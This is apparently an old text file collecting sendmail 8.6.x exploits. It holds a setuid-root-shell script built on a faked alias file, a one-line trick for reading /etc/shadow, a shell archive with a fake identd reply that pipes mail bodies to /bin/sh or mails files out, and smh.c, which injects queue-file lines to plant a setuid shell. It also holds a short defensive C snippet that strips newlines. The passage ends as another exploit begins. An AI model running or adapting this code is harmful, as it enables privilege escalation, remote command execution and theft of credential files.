sendmail2.txt

# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.
/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync
" > alias.sh
chmod 755 alias.sh
echo "Creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases
echo "Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "
# hacks follow
OA/$TEMPDIR/aliases                     # our fake alias file
Ou0                                     # user ID to run as
Og0                                     # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf
echo "Creating the sendmail script..."
cat > sendmail.script << _EOF_
helo
mail from: <nobody>
rcpt to: <yash>
data
yet another sendmail hole?  suid whoop?
\.                                      # oops.. delete \ prior to execution
quit
_EOF_
echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."
$SENDMAIL $DEBUGFLAGS -bs < sendmail.script
# give it time to execute.
sleep 4
# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &
if [ -u setid0 ]
then
 echo "setid0 is a suid shell.  executing..."
 cd /
 $TEMPDIR/setid0 /bin/csh
 echo "end of script."
 exit 0
else
 echo "setid0 is not suid; script failed."
 echo "apparently, you don't have the bug.  celebrate :-)"
 exit 1
fi

--------------------------------- CuT HeRe --------------------------------

-oE/filename bounce = 8.6.7 =

Version affected: 8.6.7

A bug in Sendmail 8.6.7 allows anyone to read any file, including the
shadowed password file:

/usr/lib/sendmail -oE/etc/shadow bounce
From: your_username

8.6.9 = 8.6.9 or earlier =

Mail any file to yourself.

------8<-------------------Cut Here--------------------8<-------------------

# This is a shell archive.  Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file".  Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
#       description
#       sm869.local
#       sm869.remote
#
echo x - description
sed 's/^X//' >description << 'END-of-description'
X
XProgram: sm869.remote
X
Xyou can:
X
X   run the body of the mail through a shell if
X   sendmail is allowed to run a shell.
X
X   write the whole message to a file.
X
X   have it send back a file to an account you specify.
X
XThe last option is supposed to remove the file after sending
Xit but I found that it hasn't in my tests.  Why?  Well
Xit has multiple recipients, one of the recipients is a
Xrecipient that will never go through.  So the data file
Xgets kept around until it gives up on that host.  This
Xcan be several days.
X
XProblems:
X
X  The action you specify will happen every 30 minutes (the
X  queue time, may be different) until it gives up sending
X  to the unreachable host.  (Actually this may be false.
X  I haven't left it around long enough to see if this happens.
X  Perhaps sendmail is smart enough to remove the other recipients
X  that did get delivered from the queue file).
X
X  If you send a file back to yourself it may get removed
X  several days later.  If you get the password file or
X  some other critical file you had better be ready to clean
X  up.
X
X  Lots of logs.  It's fairly obvious from the log files that
X  some hokey pokey is going on.  If you're sending a file
X  back to yourself then you're pointing a finger at one
X  of your accounts.
X
XYou have to go into the program to change the options you
Xwant.  The code is fairly well commented so this shouldn't
Xbe any problem.
X
XProgram: sm869.local
X
XSame thing as above really except it works even if sendmail
Xdoesn't check identd and you don't have to specify an unreachable
Xhost.  The file goes straight to the queue.
X
END-of-description

echo x - sm869.local
sed 's/^X//' >sm869.local << 'END-of-sm869.local'
X#!/bin/sh
X#
X# Exploit hole in sendmail 8.6.9 and earlier.
X#
X
X# Either write a file or run a program.
X#ACTION="|/tmp/runme"
XACTION="/tmp/writeme"
X
X# Data file to read from and then remove
XDATAFILE="/tmp/abc"
X#DATAFILE=""
X
X# Who to run as
XRUNAS="bin"
X
X# Who to send mail to
XWHOAMI=`whoami`
XSENDTO=$WHOAMI
X#SENDTO="someone-else"
X
X# Build up arg and send it off
Xif [ -n "$DATAFILE" ] ; then
XARG="$WHOAMI
XD$DATAFILE
XC:$RUNAS
XR\"$ACTION\""
Xelse
XARG="$WHOAMI
XC:$RUNAS
XR\"$ACTION\""
Xfi
Xsendmail -odq -F"$ARG" $SENDTO << _END_
XThis is appearing in the mailbox
Xand also being piped to the program or
Xwritten to the file, UNLESS you specify
Xa datafile above.  In that case the datafile
Xwill be written and erased and this text will
Xbe left (not deleted) in the queue directory.
X_END_
X
END-of-sm869.local

echo x - sm869.remote
sed 's/^X//' >sm869.remote << 'END-of-sm869.remote'
X#!/bin/sh
X#
X# exploit for sm869 or worse
X# identd must not be enabled (port 113 must be free)
X
X# this must be a host that mail can go to (MX not pointing elsewhere)
X# that we can't reach right now (ie. host doesn't exist anymore)
XUNREACHABLE="goofy.uhcc.hawaii.edu"
X
X# Commands to run on remote host
XCOMMANDS="touch /tmp/gotcha"
X
X# what host to run it on
XTARGET="localhost"
X
X# work in a temp dir
XTD=/tmp/.Xwork.$$
Xmkdir $TD
Xcd $TD
X
Xcat > a.c <<_END_
X#include <sys/types.h>
X#include <sys/socket.h>
X#include <netinet/in.h>
X
X/* run body of mail through shell run as daemon */
X#define REPLY "USERID : UNIX : a\nC:daemon\nR\"|sed '1,/^$/d'|/bin/sh\"\nHXxx: "
X
X#ifdef other_possibilities
X/* write to a file as daemon */
X#define REPLY "USERID : UNIX : a\nC:daemon\nR/tmp/writeme\nHXxx: "
X/* send back a file to someone and erase it */
X#define REPLY "USERID : UNIX : a\nD/tmp/sendtome\nRmy@address.here\nHXxx: "
X#endif
X
Xreadline(fd, buf, len)
Xchar *buf;
X{
X    int i = 0;
X
X    while(i < len && read(fd, &buf[i], 1) == 1 && buf[i]) {
X       if(buf[i] == '\r' || buf[i] == '\n')
X           break;
X       i++;
X    }
X    buf[i] = '\0';
X}
X
Xdie(str)
Xchar *str;
X{
X    perror(str); exit(1);
X}
X
Xmain()
X{
X    int s, s2, adlen;
X    struct sockaddr_in ad;
X    char buf[60];
X
X    ad.sin_family = AF_INET;
X    ad.sin_port = htons(113);
X    ad.sin_addr.s_addr = INADDR_ANY;
X    if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) die("socket");
X    if(bind(s, (struct sockaddr *)&ad, sizeof(ad)) == -1) die("bind");
X    if(listen(s, 1) == -1) die("listen");
X    adlen = sizeof(ad);
X    s2 = accept(s, (struct sockaddr *)&ad, &adlen);
X    if(s2 == -1) die("accept");
X    printf("Connection from %s port %d\n",
X        inet_ntoa(ad.sin_addr), ntohs(ad.sin_port));
X    readline(s2, buf, 50);
X    sprintf(buf + strlen(buf), " : %s\n", REPLY);
X    write(s2, buf, strlen(buf));
X}
X_END_
X
X# compile program
Xecho "compiling"
Xcc a.c -o ident
Xecho "running fake ident"
X./ident &
X
X# send to remote
Xecho "talking to remote"
X(
X  sleep 1; echo "helo"
X  sleep 1; echo "mail from: "
X  sleep 1; echo "rcpt to: "
X  sleep 1; echo "data"
X  echo "$COMMANDS"
X  echo "."
X  sleep 1; echo "quit"
X  sleep 5
X) | telnet $TARGET 25
X
X# cleanup
Xcd /
Xrm -rf $TD
Xecho "done."
X
END-of-sm869.remote
exit

.................................. CuT HeRe ..................................

8.6.9 newlines = 8.6.9 =

When sendmail queues a message for delivery, it writes a pair of files to
the spool directory (/var/spool/mqueue on many systems). One of these files
(qf<something>) holds the information needed to process the message
(headers, sender, recipients, etc.). In sendmail versions prior to 8.6.10,
one of the items kept in this file is the name of the controlling user when
mail is being delivered to a script (or file). By feeding sendmail a
recipient address that contains newlines, it is possible to add lines to the
queue file that specify a controlling user and an executable to run with
that user's access level. The 8.6.10 patch closes this hole by stripping
newlines from the recipient address before writing the queue file.
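Both the newline-in-recipient trick described above and the fake ident reply in sm869.remote work because sendmail copied an untrusted value containing line breaks into the queue file unchanged. As an added example (not code from the original text or from sendmail itself), the C below counts the control lines such a value would inject and then neutralises CR/LF in the spirit of the 8.6.10 fix; the control-letter set and the sample value are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Queue-file control letters the exploits on this page smuggle in through
 * newlines: C = controlling user, R = recipient, D = data file, M = mailer.
 * Assumption: an illustrative subset, not sendmail's full qf grammar. */
#define QF_CONTROL_LETTERS "CRDM"

/* Split an untrusted value (recipient, -F sender, ident reply) on CR/LF and
 * count the extra lines that would parse as control lines. The first line is
 * the legitimate value, so a clean single-line value returns 0. */
int count_injected_control_lines(const char *s)
{
    int injected = 0, at_line_start = 0;
    for (; *s; s++) {
        if (*s == '\n' || *s == '\r') {
            at_line_start = 1;
        } else {
            if (at_line_start && strchr(QF_CONTROL_LETTERS, *s))
                injected++;
            at_line_start = 0;
        }
    }
    return injected;
}

/* In the spirit of the 8.6.10 fix: copy s into out with every CR/LF replaced
 * by a space, so the value can occupy only one queue-file line. Returns the
 * number of line breaks neutralised; out is always NUL-terminated. */
int strip_newlines(const char *s, char *out, size_t outlen)
{
    size_t i, j = 0;
    int replaced = 0;
    for (i = 0; s[i] && j + 1 < outlen; i++) {
        if (s[i] == '\n' || s[i] == '\r') { out[j++] = ' '; replaced++; }
        else out[j++] = s[i];
    }
    out[j] = '\0';
    return replaced;
}

int main(void)
{
    /* constructed sample in the shape of the page's -F / -p payloads */
    const char *bad = "atreus\nCroot\nR/tmp/writeme";
    char clean[64];
    printf("injected control lines: %d\n", count_injected_control_lines(bad));
    strip_newlines(bad, clean, sizeof clean);
    printf("sanitised value: %s\n", clean);
    return 0;
}
```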

EXPLOIT:

/* smh.c - Michael R. Widner - atreus (2/27/95)
 *
 * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
 * hole.  It's really just a matter of passing newlines in arguments to
 * sendmail and getting the stuff into the queue files.  If we run this
 * locally with -odq we are guaranteed that it will be queued, rather than
 * processed immediately.  Wait for the queue to get processed automatically
 * or just run sendmail -q if you're impatient.
 * usage: smh [ username [/path/to/sendmail]]
 * It's worth noting that this is generally only good for getting bin.
 * sendmail still wants to process the sendmail.cf file, which contains
 * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
 * a way around this?
 * cc -o smh smh.c should do the trick.  This just creates a bin owned
 * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
 * systems this is pretty much worthless, but you're smart enough to know
 * which systems those are.  Aren't you?
 */
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
main(argc, argv)
int argc;
char **argv;
{
        execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
        "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ",
        argv[1] ? argv[1] : "atreus",0);
}

................................ CuT HeRe ..................................

8.6.10 ident/newlines = 8.6.10 =

This is a sendmail 8.6.10 attack based on the problems that sendmail 8.6.10
inherited from sendmail 8.6.9. Look at the comments in the source. Two
exploits follow:

/* 8.6.10 sendmail attacker
 *
